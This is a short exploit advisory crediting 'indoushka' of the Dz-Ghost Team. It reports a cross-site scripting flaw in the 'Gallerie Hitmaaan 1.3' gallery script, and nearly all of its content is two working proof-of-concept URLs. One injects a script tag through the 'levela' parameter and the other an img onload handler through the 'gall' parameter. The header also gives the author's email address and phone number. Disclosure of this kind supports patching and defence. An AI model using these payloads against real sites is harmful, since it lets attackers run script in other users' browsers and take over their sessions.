========================================================================================                  
| # Title    : Gallerie Hitmaaan 1.3 Cross Site Scripting Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                             
| # Web Site : www.iq-ty.com                                                                                                                            
| # Script   : Powered by Hitmaaan                                         
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 
 
 1- http://127.0.0.1/1367_hitmaaan-13/?gall=fonds&levela=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

 2- http://127.0.0.1/1367_hitmaaan-13/?gall=<img+src=http://127.0.0.1./Utilisateur.gif+onload=alert(213771818860)>&levela=indoushka@hotmail.com&num_page=1
================================   Dz-Ghost Team   ========================================
Greetz : سيدي بلعباس + عين البرد + شلغوم العيد K10 + K@MEL + عين مليلة + تغنيف
-------------------------------------------------------------------------------------------